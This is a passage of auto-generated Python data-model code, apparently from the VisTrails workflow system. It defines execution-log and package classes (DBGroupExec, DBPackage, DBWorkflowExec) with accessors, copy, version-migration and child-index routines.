def __set_db_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
self.is_dirty = True
db_parentObjType = property(__get_db_parentObjType, __set_db_parentObjType)
def db_add_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_change_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_delete_parentObjType(self, parentObjType):
self._db_parentObjType = None
def getPrimaryKey(self):
return self._db_id
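# DBGroupExec looks to be an execution-log record for one run of a group
# module: timestamps (ts_start/ts_end), a completed/error outcome, and
# back-references to the executed module and machine via
# module_id/machine_id. It nests annotations, loop_execs, module_execs and
# further group_execs, so group executions recurse.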
class DBGroupExec(object):
vtType = 'group_exec'
def __init__(self, id=None, ts_start=None, ts_end=None, cached=None, module_id=None, group_name=None, group_type=None, completed=None, error=None, machine_id=None, annotations=None, loop_execs=None, module_execs=None, group_execs=None):
self._db_id = id
self._db_ts_start = ts_start
self._db_ts_end = ts_end
self._db_cached = cached
self._db_module_id = module_id
self._db_group_name = group_name
self._db_group_type = group_type
self._db_completed = completed
self._db_error = error
self._db_machine_id = machine_id
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_deleted_loop_execs = []
self.db_loop_execs_id_index = {}
if loop_execs is None:
self._db_loop_execs = []
else:
self._db_loop_execs = loop_execs
for v in self._db_loop_execs:
self.db_loop_execs_id_index[v.db_id] = v
self.db_deleted_module_execs = []
self.db_module_execs_id_index = {}
if module_execs is None:
self._db_module_execs = []
else:
self._db_module_execs = module_execs
for v in self._db_module_execs:
self.db_module_execs_id_index[v.db_id] = v
self.db_deleted_group_execs = []
self.db_group_execs_id_index = {}
if group_execs is None:
self._db_group_execs = []
else:
self._db_group_execs = group_execs
for v in self._db_group_execs:
self.db_group_execs_id_index[v.db_id] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBGroupExec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBGroupExec(id=self._db_id,
ts_start=self._db_ts_start,
ts_end=self._db_ts_end,
cached=self._db_cached,
module_id=self._db_module_id,
group_name=self._db_group_name,
group_type=self._db_group_type,
completed=self._db_completed,
error=self._db_error,
machine_id=self._db_machine_id)
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
if self._db_loop_execs is None:
cp._db_loop_execs = []
else:
cp._db_loop_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_loop_execs]
if self._db_module_execs is None:
cp._db_module_execs = []
else:
cp._db_module_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_module_execs]
if self._db_group_execs is None:
cp._db_group_execs = []
else:
cp._db_group_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_group_execs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_module_id') and ('module', self._db_module_id) in id_remap:
cp._db_module_id = id_remap[('module', self._db_module_id)]
if hasattr(self, 'db_machine_id') and ('machine', self._db_machine_id) in id_remap:
cp._db_machine_id = id_remap[('machine', self._db_machine_id)]
# recreate indices and set flags
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_loop_execs_id_index = dict((v.db_id, v) for v in cp._db_loop_execs)
cp.db_module_execs_id_index = dict((v.db_id, v) for v in cp._db_module_execs)
cp.db_group_execs_id_index = dict((v.db_id, v) for v in cp._db_group_execs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBGroupExec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ts_start' in class_dict:
res = class_dict['ts_start'](old_obj, trans_dict)
new_obj.db_ts_start = res
elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
new_obj.db_ts_start = old_obj.db_ts_start
if 'ts_end' in class_dict:
res = class_dict['ts_end'](old_obj, trans_dict)
new_obj.db_ts_end = res
elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
new_obj.db_ts_end = old_obj.db_ts_end
if 'cached' in class_dict:
res = class_dict['cached'](old_obj, trans_dict)
new_obj.db_cached = res
elif hasattr(old_obj, 'db_cached') and old_obj.db_cached is not None:
new_obj.db_cached = old_obj.db_cached
if 'module_id' in class_dict:
res = class_dict['module_id'](old_obj, trans_dict)
new_obj.db_module_id = res
elif hasattr(old_obj, 'db_module_id') and old_obj.db_module_id is not None:
new_obj.db_module_id = old_obj.db_module_id
if 'group_name' in class_dict:
res = class_dict['group_name'](old_obj, trans_dict)
new_obj.db_group_name = res
elif hasattr(old_obj, 'db_group_name') and old_obj.db_group_name is not None:
new_obj.db_group_name = old_obj.db_group_name
if 'group_type' in class_dict:
res = class_dict['group_type'](old_obj, trans_dict)
new_obj.db_group_type = res
elif hasattr(old_obj, 'db_group_type') and old_obj.db_group_type is not None:
new_obj.db_group_type = old_obj.db_group_type
if 'completed' in class_dict:
res = class_dict['completed'](old_obj, trans_dict)
new_obj.db_completed = res
elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
new_obj.db_completed = old_obj.db_completed
if 'error' in class_dict:
res = class_dict['error'](old_obj, trans_dict)
new_obj.db_error = res
elif hasattr(old_obj, 'db_error') and old_obj.db_error is not None:
new_obj.db_error = old_obj.db_error
if 'machine_id' in class_dict:
res = class_dict['machine_id'](old_obj, trans_dict)
new_obj.db_machine_id = res
elif hasattr(old_obj, 'db_machine_id') and old_obj.db_machine_id is not None:
new_obj.db_machine_id = old_obj.db_machine_id
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
if 'loop_execs' in class_dict:
res = class_dict['loop_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_loop_exec(obj)
elif hasattr(old_obj, 'db_loop_execs') and old_obj.db_loop_execs is not None:
for obj in old_obj.db_loop_execs:
new_obj.db_add_loop_exec(DBLoopExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_loop_execs') and hasattr(new_obj, 'db_deleted_loop_execs'):
for obj in old_obj.db_deleted_loop_execs:
n_obj = DBLoopExec.update_version(obj, trans_dict)
new_obj.db_deleted_loop_execs.append(n_obj)
if 'module_execs' in class_dict:
res = class_dict['module_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_module_exec(obj)
elif hasattr(old_obj, 'db_module_execs') and old_obj.db_module_execs is not None:
for obj in old_obj.db_module_execs:
new_obj.db_add_module_exec(DBModuleExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_module_execs') and hasattr(new_obj, 'db_deleted_module_execs'):
for obj in old_obj.db_deleted_module_execs:
n_obj = DBModuleExec.update_version(obj, trans_dict)
new_obj.db_deleted_module_execs.append(n_obj)
if 'group_execs' in class_dict:
res = class_dict['group_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_group_exec(obj)
elif hasattr(old_obj, 'db_group_execs') and old_obj.db_group_execs is not None:
for obj in old_obj.db_group_execs:
new_obj.db_add_group_exec(DBGroupExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_group_execs') and hasattr(new_obj, 'db_deleted_group_execs'):
for obj in old_obj.db_deleted_group_execs:
n_obj = DBGroupExec.update_version(obj, trans_dict)
new_obj.db_deleted_group_execs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_loop_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_loop_exec(child)
to_del = []
for child in self.db_module_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_module_exec(child)
to_del = []
for child in self.db_group_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_group_exec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_loop_execs)
children.extend(self.db_deleted_module_execs)
children.extend(self.db_deleted_group_execs)
if remove:
self.db_deleted_annotations = []
self.db_deleted_loop_execs = []
self.db_deleted_module_execs = []
self.db_deleted_group_execs = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_loop_execs:
if child.has_changes():
return True
for child in self._db_module_execs:
if child.has_changes():
return True
for child in self._db_group_execs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_ts_start(self):
return self._db_ts_start
def __set_db_ts_start(self, ts_start):
self._db_ts_start = ts_start
self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
def db_add_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_change_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_delete_ts_start(self, ts_start):
self._db_ts_start = None
def __get_db_ts_end(self):
return self._db_ts_end
def __set_db_ts_end(self, ts_end):
self._db_ts_end = ts_end
self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
def db_add_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_change_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_delete_ts_end(self, ts_end):
self._db_ts_end = None
def __get_db_cached(self):
return self._db_cached
def __set_db_cached(self, cached):
self._db_cached = cached
self.is_dirty = True
db_cached = property(__get_db_cached, __set_db_cached)
def db_add_cached(self, cached):
self._db_cached = cached
def db_change_cached(self, cached):
self._db_cached = cached
def db_delete_cached(self, cached):
self._db_cached = None
def __get_db_module_id(self):
return self._db_module_id
def __set_db_module_id(self, module_id):
self._db_module_id = module_id
self.is_dirty = True
db_module_id = property(__get_db_module_id, __set_db_module_id)
def db_add_module_id(self, module_id):
self._db_module_id = module_id
def db_change_module_id(self, module_id):
self._db_module_id = module_id
def db_delete_module_id(self, module_id):
self._db_module_id = None
def __get_db_group_name(self):
return self._db_group_name
def __set_db_group_name(self, group_name):
self._db_group_name = group_name
self.is_dirty = True
db_group_name = property(__get_db_group_name, __set_db_group_name)
def db_add_group_name(self, group_name):
self._db_group_name = group_name
def db_change_group_name(self, group_name):
self._db_group_name = group_name
def db_delete_group_name(self, group_name):
self._db_group_name = None
def __get_db_group_type(self):
return self._db_group_type
def __set_db_group_type(self, group_type):
self._db_group_type = group_type
self.is_dirty = True
db_group_type = property(__get_db_group_type, __set_db_group_type)
def db_add_group_type(self, group_type):
self._db_group_type = group_type
def db_change_group_type(self, group_type):
self._db_group_type = group_type
def db_delete_group_type(self, group_type):
self._db_group_type = None
def __get_db_completed(self):
return self._db_completed
def __set_db_completed(self, completed):
self._db_completed = completed
self.is_dirty = True
db_completed = property(__get_db_completed, __set_db_completed)
def db_add_completed(self, completed):
self._db_completed = completed
def db_change_completed(self, completed):
self._db_completed = completed
def db_delete_completed(self, completed):
self._db_completed = None
def __get_db_error(self):
return self._db_error
def __set_db_error(self, error):
self._db_error = error
self.is_dirty = True
db_error = property(__get_db_error, __set_db_error)
def db_add_error(self, error):
self._db_error = error
def db_change_error(self, error):
self._db_error = error
def db_delete_error(self, error):
self._db_error = None
def __get_db_machine_id(self):
return self._db_machine_id
def __set_db_machine_id(self, machine_id):
self._db_machine_id = machine_id
self.is_dirty = True
db_machine_id = property(__get_db_machine_id, __set_db_machine_id)
def db_add_machine_id(self, machine_id):
self._db_machine_id = machine_id
def db_change_machine_id(self, machine_id):
self._db_machine_id = machine_id
def db_delete_machine_id(self, machine_id):
self._db_machine_id = None
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def __get_db_loop_execs(self):
return self._db_loop_execs
def __set_db_loop_execs(self, loop_execs):
self._db_loop_execs = loop_execs
self.is_dirty = True
db_loop_execs = property(__get_db_loop_execs, __set_db_loop_execs)
def db_get_loop_execs(self):
return self._db_loop_execs
def db_add_loop_exec(self, loop_exec):
self.is_dirty = True
self._db_loop_execs.append(loop_exec)
self.db_loop_execs_id_index[loop_exec.db_id] = loop_exec
def db_change_loop_exec(self, loop_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == loop_exec.db_id:
self._db_loop_execs[i] = loop_exec
found = True
break
if not found:
self._db_loop_execs.append(loop_exec)
self.db_loop_execs_id_index[loop_exec.db_id] = loop_exec
def db_delete_loop_exec(self, loop_exec):
self.is_dirty = True
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == loop_exec.db_id:
if not self._db_loop_execs[i].is_new:
self.db_deleted_loop_execs.append(self._db_loop_execs[i])
del self._db_loop_execs[i]
break
del self.db_loop_execs_id_index[loop_exec.db_id]
def db_get_loop_exec(self, key):
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == key:
return self._db_loop_execs[i]
return None
def db_get_loop_exec_by_id(self, key):
return self.db_loop_execs_id_index[key]
def db_has_loop_exec_with_id(self, key):
return key in self.db_loop_execs_id_index
def __get_db_module_execs(self):
return self._db_module_execs
def __set_db_module_execs(self, module_execs):
self._db_module_execs = module_execs
self.is_dirty = True
db_module_execs = property(__get_db_module_execs, __set_db_module_execs)
def db_get_module_execs(self):
return self._db_module_execs
def db_add_module_exec(self, module_exec):
self.is_dirty = True
self._db_module_execs.append(module_exec)
self.db_module_execs_id_index[module_exec.db_id] = module_exec
def db_change_module_exec(self, module_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == module_exec.db_id:
self._db_module_execs[i] = module_exec
found = True
break
if not found:
self._db_module_execs.append(module_exec)
self.db_module_execs_id_index[module_exec.db_id] = module_exec
def db_delete_module_exec(self, module_exec):
self.is_dirty = True
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == module_exec.db_id:
if not self._db_module_execs[i].is_new:
self.db_deleted_module_execs.append(self._db_module_execs[i])
del self._db_module_execs[i]
break
del self.db_module_execs_id_index[module_exec.db_id]
def db_get_module_exec(self, key):
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == key:
return self._db_module_execs[i]
return None
def db_get_module_exec_by_id(self, key):
return self.db_module_execs_id_index[key]
def db_has_module_exec_with_id(self, key):
return key in self.db_module_execs_id_index
def __get_db_group_execs(self):
return self._db_group_execs
def __set_db_group_execs(self, group_execs):
self._db_group_execs = group_execs
self.is_dirty = True
db_group_execs = property(__get_db_group_execs, __set_db_group_execs)
def db_get_group_execs(self):
return self._db_group_execs
def db_add_group_exec(self, group_exec):
self.is_dirty = True
self._db_group_execs.append(group_exec)
self.db_group_execs_id_index[group_exec.db_id] = group_exec
def db_change_group_exec(self, group_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == group_exec.db_id:
self._db_group_execs[i] = group_exec
found = True
break
if not found:
self._db_group_execs.append(group_exec)
self.db_group_execs_id_index[group_exec.db_id] = group_exec
def db_delete_group_exec(self, group_exec):
self.is_dirty = True
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == group_exec.db_id:
if not self._db_group_execs[i].is_new:
self.db_deleted_group_execs.append(self._db_group_execs[i])
del self._db_group_execs[i]
break
del self.db_group_execs_id_index[group_exec.db_id]
def db_get_group_exec(self, key):
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == key:
return self._db_group_execs[i]
return None
def db_get_group_exec_by_id(self, key):
return self.db_group_execs_id_index[key]
def db_has_group_exec_with_id(self, key):
return key in self.db_group_execs_id_index
def getPrimaryKey(self):
return self._db_id
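# Note on the generated accessor pattern above: assigning through a db_*
# property (e.g. db_ts_start) flags the object via is_dirty, while the
# low-level db_add_*/db_change_*/db_delete_* scalar helpers update the
# backing field without touching the dirty flag; the collection helpers
# (db_add_annotation, db_delete_loop_exec, ...) do set is_dirty and keep
# the per-collection id indices in sync. has_changes() then reports True
# if this object or any child in those collections is dirty.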
class DBPackage(object):
vtType = 'package'
def __init__(self, id=None, name=None, identifier=None, codepath=None, load_configuration=None, version=None, description=None, module_descriptors=None):
self._db_id = id
self._db_name = name
self._db_identifier = identifier
self._db_codepath = codepath
self._db_load_configuration = load_configuration
self._db_version = version
self._db_description = description
self.db_deleted_module_descriptors = []
self.db_module_descriptors_id_index = {}
self.db_module_descriptors_name_index = {}
if module_descriptors is None:
self._db_module_descriptors = []
else:
self._db_module_descriptors = module_descriptors
for v in self._db_module_descriptors:
self.db_module_descriptors_id_index[v.db_id] = v
self.db_module_descriptors_name_index[(v.db_name,v.db_namespace,v.db_version)] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBPackage.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBPackage(id=self._db_id,
name=self._db_name,
identifier=self._db_identifier,
codepath=self._db_codepath,
load_configuration=self._db_load_configuration,
version=self._db_version,
description=self._db_description)
if self._db_module_descriptors is None:
cp._db_module_descriptors = []
else:
cp._db_module_descriptors = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_module_descriptors]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_module_descriptors_id_index = dict((v.db_id, v) for v in cp._db_module_descriptors)
cp.db_module_descriptors_name_index = dict(((v.db_name,v.db_namespace,v.db_version), v) for v in cp._db_module_descriptors)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBPackage()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'identifier' in class_dict:
res = class_dict['identifier'](old_obj, trans_dict)
new_obj.db_identifier = res
elif hasattr(old_obj, 'db_identifier') and old_obj.db_identifier is not None:
new_obj.db_identifier = old_obj.db_identifier
if 'codepath' in class_dict:
res = class_dict['codepath'](old_obj, trans_dict)
new_obj.db_codepath = res
elif hasattr(old_obj, 'db_codepath') and old_obj.db_codepath is not None:
new_obj.db_codepath = old_obj.db_codepath
if 'load_configuration' in class_dict:
res = class_dict['load_configuration'](old_obj, trans_dict)
new_obj.db_load_configuration = res
elif hasattr(old_obj, 'db_load_configuration') and old_obj.db_load_configuration is not None:
new_obj.db_load_configuration = old_obj.db_load_configuration
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'description' in class_dict:
res = class_dict['description'](old_obj, trans_dict)
new_obj.db_description = res
elif hasattr(old_obj, 'db_description') and old_obj.db_description is not None:
new_obj.db_description = old_obj.db_description
if 'module_descriptors' in class_dict:
res = class_dict['module_descriptors'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_module_descriptor(obj)
elif hasattr(old_obj, 'db_module_descriptors') and old_obj.db_module_descriptors is not None:
for obj in old_obj.db_module_descriptors:
new_obj.db_add_module_descriptor(DBModuleDescriptor.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_module_descriptors') and hasattr(new_obj, 'db_deleted_module_descriptors'):
for obj in old_obj.db_deleted_module_descriptors:
n_obj = DBModuleDescriptor.update_version(obj, trans_dict)
new_obj.db_deleted_module_descriptors.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_module_descriptors:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_module_descriptor(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_module_descriptors)
if remove:
self.db_deleted_module_descriptors = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_module_descriptors:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_identifier(self):
return self._db_identifier
def __set_db_identifier(self, identifier):
self._db_identifier = identifier
self.is_dirty = True
db_identifier = property(__get_db_identifier, __set_db_identifier)
def db_add_identifier(self, identifier):
self._db_identifier = identifier
def db_change_identifier(self, identifier):
self._db_identifier = identifier
def db_delete_identifier(self, identifier):
self._db_identifier = None
def __get_db_codepath(self):
return self._db_codepath
def __set_db_codepath(self, codepath):
self._db_codepath = codepath
self.is_dirty = True
db_codepath = property(__get_db_codepath, __set_db_codepath)
def db_add_codepath(self, codepath):
self._db_codepath = codepath
def db_change_codepath(self, codepath):
self._db_codepath = codepath
def db_delete_codepath(self, codepath):
self._db_codepath = None
def __get_db_load_configuration(self):
return self._db_load_configuration
def __set_db_load_configuration(self, load_configuration):
self._db_load_configuration = load_configuration
self.is_dirty = True
db_load_configuration = property(__get_db_load_configuration, __set_db_load_configuration)
def db_add_load_configuration(self, load_configuration):
self._db_load_configuration = load_configuration
def db_change_load_configuration(self, load_configuration):
self._db_load_configuration = load_configuration
def db_delete_load_configuration(self, load_configuration):
self._db_load_configuration = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_description(self):
return self._db_description
def __set_db_description(self, description):
self._db_description = description
self.is_dirty = True
db_description = property(__get_db_description, __set_db_description)
def db_add_description(self, description):
self._db_description = description
def db_change_description(self, description):
self._db_description = description
def db_delete_description(self, description):
self._db_description = None
def __get_db_module_descriptors(self):
return self._db_module_descriptors
def __set_db_module_descriptors(self, module_descriptors):
self._db_module_descriptors = module_descriptors
self.is_dirty = True
db_module_descriptors = property(__get_db_module_descriptors, __set_db_module_descriptors)
def db_get_module_descriptors(self):
return self._db_module_descriptors
def db_add_module_descriptor(self, module_descriptor):
self.is_dirty = True
self._db_module_descriptors.append(module_descriptor)
self.db_module_descriptors_id_index[module_descriptor.db_id] = module_descriptor
self.db_module_descriptors_name_index[(module_descriptor.db_name,module_descriptor.db_namespace,module_descriptor.db_version)] = module_descriptor
def db_change_module_descriptor(self, module_descriptor):
self.is_dirty = True
found = False
for i in xrange(len(self._db_module_descriptors)):
if self._db_module_descriptors[i].db_id == module_descriptor.db_id:
self._db_module_descriptors[i] = module_descriptor
found = True
break
if not found:
self._db_module_descriptors.append(module_descriptor)
self.db_module_descriptors_id_index[module_descriptor.db_id] = module_descriptor
self.db_module_descriptors_name_index[(module_descriptor.db_name,module_descriptor.db_namespace,module_descriptor.db_version)] = module_descriptor
def db_delete_module_descriptor(self, module_descriptor):
self.is_dirty = True
for i in xrange(len(self._db_module_descriptors)):
if self._db_module_descriptors[i].db_id == module_descriptor.db_id:
if not self._db_module_descriptors[i].is_new:
self.db_deleted_module_descriptors.append(self._db_module_descriptors[i])
del self._db_module_descriptors[i]
break
del self.db_module_descriptors_id_index[module_descriptor.db_id]
del self.db_module_descriptors_name_index[(module_descriptor.db_name,module_descriptor.db_namespace,module_descriptor.db_version)]
def db_get_module_descriptor(self, key):
for i in xrange(len(self._db_module_descriptors)):
if self._db_module_descriptors[i].db_id == key:
return self._db_module_descriptors[i]
return None
def db_get_module_descriptor_by_id(self, key):
return self.db_module_descriptors_id_index[key]
def db_has_module_descriptor_with_id(self, key):
return key in self.db_module_descriptors_id_index
def db_get_module_descriptor_by_name(self, key):
return self.db_module_descriptors_name_index[key]
def db_has_module_descriptor_with_name(self, key):
return key in self.db_module_descriptors_name_index
def getPrimaryKey(self):
return self._db_id
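# Minimal usage sketch for the two DBPackage indices (illustrative only;
# it assumes DBModuleDescriptor, defined elsewhere in this module, takes
# keyword arguments mirroring its db_id/db_name/db_namespace/db_version
# fields):
#
#     desc = DBModuleDescriptor(id=1, name='Map', namespace='', version='1.0')
#     pkg = DBPackage(id=0, name='controlflow')
#     pkg.db_add_module_descriptor(desc)   # updates both id and name indices
#     pkg.db_get_module_descriptor_by_id(1)
#     pkg.db_get_module_descriptor_by_name(('Map', '', '1.0'))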
class DBWorkflowExec(object):
vtType = 'workflow_exec'
def __init__(self, items=None, id=None, user=None, ip=None, session=None, vt_version=None, ts_start=None, ts_end=None, parent_id=None, parent_type=None, parent_version=None, completed=None, name=None):
self.db_deleted_items = []
self.db_items_id_index = {}
if items is None:
self._db_items = []
else:
self._db_items = items
for v in self._db_items:
self.db_items_id_index[v.db_id] = v
self._db_id = id
self._db_user = user
self._db_ip = ip
self._db_session = session
self._db_vt_version = vt_version
self._db_ts_start = ts_start
self._db_ts_end = ts_end
self._db_parent_id = parent_id
self._db_parent_type = parent_type
self._db_parent_version = parent_version
self._db_completed = completed
self._db_name = name
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBWorkflowExec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBWorkflowExec(id=self._db_id,
user=self._db_user,
ip=self._db_ip,
session=self._db_session,
vt_version=self._db_vt_version,
ts_start=self._db_ts_start,
ts_end=self._db_ts_end,
parent_id=self._db_parent_id,
parent_type=self._db_parent_type,
parent_version=self._db_parent_version,
completed=self._db_completed,
name=self._db_name)
if self._db_items is None:
cp._db_items = []
else:
cp._db_items = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_items]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_items_id_index = dict((v.db_id, v) for v in cp._db_items)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBWorkflowExec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'items' in class_dict:
res = class_dict['items'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_item(obj)
